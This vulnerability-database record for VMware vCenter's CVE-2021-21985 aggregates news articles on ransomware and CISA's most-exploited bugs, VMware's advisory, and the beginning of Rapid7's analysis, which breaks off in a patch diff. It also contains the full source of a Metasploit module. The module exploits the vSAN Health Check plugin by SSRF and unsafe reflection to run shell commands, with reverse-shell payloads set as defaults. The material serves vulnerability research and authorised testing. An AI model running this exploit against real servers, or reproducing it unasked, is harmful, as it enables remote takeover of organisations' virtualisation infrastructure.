are likely to have a higher motivation for payment, and that is the next evolution in this business,\u201d Schrader said via email. \u201cWe already see the early effects. 
Kaseya, SolarWinds, tools that promise access to high-value assets, where an organization\u2019s revenue stream and reputation depends on.\u201d\n\nSchrader thinks that VMware\u2019s recently added capability of [encrypting ESXi servers](<https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.security.doc/GUID-8D7D09AC-8579-4A33-9449-8E8BA49A3003.html>) is \u201ca harbinger of what will come,\u201d pointing to CISA\u2019s recent alert about the top routinely exploited vulnerabilities, which included a [warning about CVE-2021-21985](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/04/unpatched-vmware-vcenter-software>): the critical remote code execution (RCE) [vulnerability in VMware vCenter Server](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) and VMware Cloud Foundation.\n\n\u201cIn essence, not paying a ransom is the only angle that will \u2013 over time \u2013 eradicate ransomware,\u201d Schrader said. \u201cAnd to be positioned for that, companies will have to minimize and protect their attack surface, harden their systems and infrastructure, manage existing accounts properly and delete old ones, patch vulnerabilities according to risks, and be able to operate in a cyber-resilient manner when under attack.\u201d\n\n## Where\u2019s the MBA Coursework About Ransomware?\n\nGroupSense\u2019s Fowler said that the focus has to be on prevention and mitigation before ransomware is deployed. But what about after? \u201cRansomware attacks are a cyber issue up to the point that the ransomware is executed,\u201d he pointed out. 
\u201cThen it becomes a business issue, and this presents business considerations and continuity hurdles not part of the curriculum on any MBA course I\u2019m familiar with currently.\u201d\n\n072821 16:28 UPDATE: Added input from Mike Fowler.\n\n[](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11 AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T18:33:02", "type": "threatpost", "title": "New Ransomware Gangs Haron & BlackMatter Are After Fat Cats", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-07-28T18:33:02", "id": "THREATPOST:6BB33156369CC57707F857196BE6B060", "href": "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-26T19:52:09", "description": "VMware patched a critical bug impacting its vCenter Server platform with a severity rating of 9.8 out of 10. The company said the flaw could allow a remote attacker to exploit its products and take control of a company\u2019s affected system.\n\nVMware went a step further on Tuesday, calling on IT security teams \u2013[ already on high alert over an uptick in costly and destructive ransomware attacks](<https://threatpost.com/ebook-2021-ransomware-emerging-risks/165477/>) \u2013 to patch systems fast. \n[](<https://threatpost.com/newsletter-sign/>)\u201cIn this era of ransomware it is safest to assume that an attacker is already inside the network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible,\u201d wrote VMware\u2019s Bob Plankers, technical marketing architect [in a Tuesday post](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>).\n\n## **Critical Bug Impacts Critical Mass? 
**\n\nThe vulnerability, [tracked as CVE-2021-21985](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), impacts vCenter Server platforms, which are in widespread use and are used to administer VMware\u2019s market leading vSphere and ESXi host products.\n\nClaire Tills, a senior research engineer with Tenable, wrote in a post [commenting on the bug](<https://www.tenable.com/blog/cve-2021-21985-critical-vmware-vcenter-server-remote-code-execution?utm_source=email_alert&utm_medium=email&utm_campaign=srt_emails>), \u201cpatching these flaws should be a top priority. Successful exploitation would allow an attacker to execute arbitrary commands on the underlying vCenter host.\u201d\n\nTills noted that exploiting the vulnerability is trivial. All an attacker would need to do is be able to access vCenter Server over port 443, she wrote. \u201cEven if an organization has not exposed vCenter Server externally, attackers can still exploit this flaw once inside a network.\u201d\n\nKenna Security\u2019s director of security research Jerry Gamblin, however, noted that estimates of how many networks are vulnerable to attack are relatively small.\n\n\u201cSome early [research from Rapid 7](<https://twitter.com/hrbrmstr/status/1397579958697054211>) shows that only around 6K\u2019s VCenters are exposed directly to the internet, which makes the \u2018blast radius\u2019 tiny and the initial entry point into a network unlikely with this pair of CVES,\u201d Gamblin wrote in an email commentary to Threatpost.\n\nGamblin is referring to both the critical CVE-2021-21985 bug and a second vulnerability reported by VMware on Tuesday, [CVE-2021-21986](<https://www.tenable.com/cve/CVE-2021-21986>). 
This second bug has a medium CVSS severity rating of 6.5 and is tied to an authentication mechanism issue in vCenter Server plugins.\n\n## **Breaking Down the Critical Bug **\n\nWorkarounds and updates are available to mitigate both flaws, [according to VMware](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>).\n\n\u201cThe vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server,\u201d VMware\u2019s security bulletin states for the critical (CVE-2021-21985) bug. \u201cThe affected Virtual SAN Health Check plug-in is enabled by default in all vCenter Server deployments, whether or not vSAN is being used.\u201d\n\nVMware\u2019s Virtual San (or vSAN) is a software-defined storage solution that typically supports hyper-converged infrastructure. The Health Check plug-in \u201cchecks to monitor the status of cluster components, diagnose issues, and troubleshoot problems,\u201d according to a [VMware description of the tool](<https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.vsan-monitoring.doc/GUID-B0A8BF17-E3FB-421A-AC1A-8C1EC27294D5.html>).\n\nVMware credited the researcher identified only as \u201cRicter Z\u201d of 360 Noah Lab for finding the bug.\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on**** **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. 
Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** ****for free.**\n", "cvss3": {}, "published": "2021-05-26T19:45:50", "type": "threatpost", "title": "VMware Sounds Ransomware Alarm Over Critical Severity Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986"], "modified": "2021-05-26T19:45:50", "id": "THREATPOST:DAA85537BDD9022F1F98B328EFF7B7B9", "href": "https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. 
One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. 
\u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 and 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE-2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE-2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE-2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. 
For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. 
defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. 
The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It raises the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Bar-Dayan said. 
\u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 
10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2022-05-26T00:56:13", "description": "3a. VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client (CVE-2021-21985) \n\nThe vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. Authentication mechanism issue in vCenter Server Plug-ins (CVE-2021-21986) \n\nThe vSphere Client (HTML5) contains a vulnerability in a vSphere authentication mechanism for the Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins. 
VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-25T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address remote code execution and authentication vulnerabilities (CVE-2021-21985, CVE-2021-21986)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986"], "modified": "2021-05-25T00:00:00", "id": "VMSA-2021-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0010.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-11-02T03:03:16", "description": "This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. 
Tested against VMware vCenter Server 6.7 Update 3m (Linux appliance).\n", "cvss3": {}, "published": "2021-07-12T18:07:05", "type": "metasploit", "title": "VMware vCenter Server Virtual SAN Health Check Plugin RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-2021", "CVE-2021-21985"], "modified": "2021-07-13T01:29:56", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_VSAN_HEALTH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE',\n 'Description' => %q{\n This module exploits Java unsafe reflection and SSRF in the VMware\n vCenter Server Virtual SAN Health Check plugin's ProxygenController\n class to execute code as the vsphere-ui user.\n\n See the vendor advisory for affected and patched versions. 
Tested\n against VMware vCenter Server 6.7 Update 3m (Linux appliance).\n },\n 'Author' => [\n 'Ricter Z', # Discovery and PoC used\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21985'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'],\n ['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'],\n ['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'],\n # Other great writeups!\n ['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'],\n ['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'],\n ['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'],\n ['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC']\n ],\n 'DisclosureDate' => '2021-05-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => 
normalize_uri(\n target_uri.path,\n '/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty'\n ),\n 'ctype' => 'application/json',\n 'data' => {\n 'methodInput' => ['user.name', nil]\n }.to_json\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui'\n return CheckCode::Safe\n end\n\n CheckCode::Vulnerable('System property user.name is vsphere-ui.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(cmd)\n\n url = OfflineBundle.new(cmd).to_url\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(\n target_uri.path,\n '/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages'\n ),\n 'ctype' => 'application/json',\n 'data' => {\n 'methodInput' => [\n [\"https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}\"],\n false # lazyInit\n ]\n }.to_json\n )\n\n fail_with(Failure::PayloadFailed, cmd) unless res&.code == 200\n end\n\n class OfflineBundle\n attr_accessor :cmd\n\n def initialize(cmd)\n @cmd = cmd\n end\n\n def to_xml\n bean = Rex::Text.rand_text_alpha_lower(8..16)\n prop = Rex::Text.rand_text_alpha_lower(8..16)\n\n # https://www.tutorialspoint.com/spring/spring_bean_definition.htm\n <<~XML\n <beans>\n <bean id=\"#{bean}\" class=\"java.lang.ProcessBuilder\">\n <constructor-arg>\n <list>\n <value>/bin/bash</value>\n <value>-c</value>\n <value><![CDATA[#{cmd}]]></value>\n </list>\n </constructor-arg>\n <property name=\"#{prop}\" value=\"\\#{#{bean}.start()}\"/>\n </bean>\n </beans>\n XML\n end\n\n def to_zip\n Msf::Util::EXE.to_zip([\n fname: 'offline_bundle.xml',\n data: to_xml.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ])\n end\n\n def to_url\n # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs\n 
\"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}\"\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_vsan_health_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2021-07-24T09:59:06", "description": "Rapid7\n\n[May 26, 2021 5:34pm UTC (1 day ago)](https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?#rapid7-analysis)\u2022 Last updated May 27, 2021 6:39pm UTC (7 hours ago)\n\n\n\n###### Technical Analysis\n\n**Threat status:** Impending threat\n**Attacker utility:** Network infrastructure compromise\n\n## Description\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](https://www.vmware.com/security/advisories/VMSA-2021-0010.html), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server and VMware Cloud Foundation. The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nVMware has released a [blog post](https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html) and a [supplemental FAQ](https://core.vmware.com/resource/vmsa-2021-0010-faq) for VMSA-2021-0010, which highlights the elevated threat of ransomware, including against organizations running vCenter Server. 
As of May 26, 2021, there are no reports of exploitation in the wild\u2014this, however, is unlikely to last.\n\n## Affected products\n\n- vCenter Server 6.5\n- vCenter Server 6.7\n- vCenter Server 7.0\n- Cloud Foundation (vCenter Server) 3.x\n- Cloud Foundation (vCenter Server) 4.x\n\nFor information on fixed versions, see the matrix of affected products and updates in VMware\u2019s advisory: https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n\n## Rapid7 analysis\n\nAs with [previous vCenter Server vulnerabilities](https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis), we classify CVE-2021-21985 as an impending threat: It is a high-value attack target for both advanced and commodity threat actors, and we expect exploitation to occur quickly and at scale. As of May 26, 2021, Rapid7 Labs identified roughly 6,000 vCenter Server instances exposed to the public internet.\n\n### Patch\n\nThe following changes add authentication to the Virtual SAN Health Check plugin\u2019s `/rest/*` endpoints:\n\n```xml\n--- a/unpatched/src/h5-vsan-context.jar/WEB-INF/web.xml\n+++ b/patched/src/h5-vsan-context.jar/WEB-INF/web.xml\n@@ -5,6 +5,21 @@\n\n <display-name>h5-vsan-service</display-name>\n\n+ <context-param>\n+ <param-name>contextConfigLocation</param-name>\n+ <param-value>/WEB-INF/spring/bundle-context.xml</param-value>\n+ </context-param>\n+\n+ <!-- The application context needs to be OSGI-enabled in order to look up services -->\n+ <context-param>\n+ <param-name>contextClass</param-name>\n+ <param-value>org.eclipse.virgo.web.dm.ServerOsgiBundleXmlWebApplicationContext</param-value>\n+ </context-param>\n+\n+ <listener>\n+ <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>\n+ </listener>\n+\n <!-- Processes application requests -->\n <servlet>\n <servlet-name>springServlet</servlet-name>\n@@ -12,7 +27,7 @@\n\n <init-param>\n 
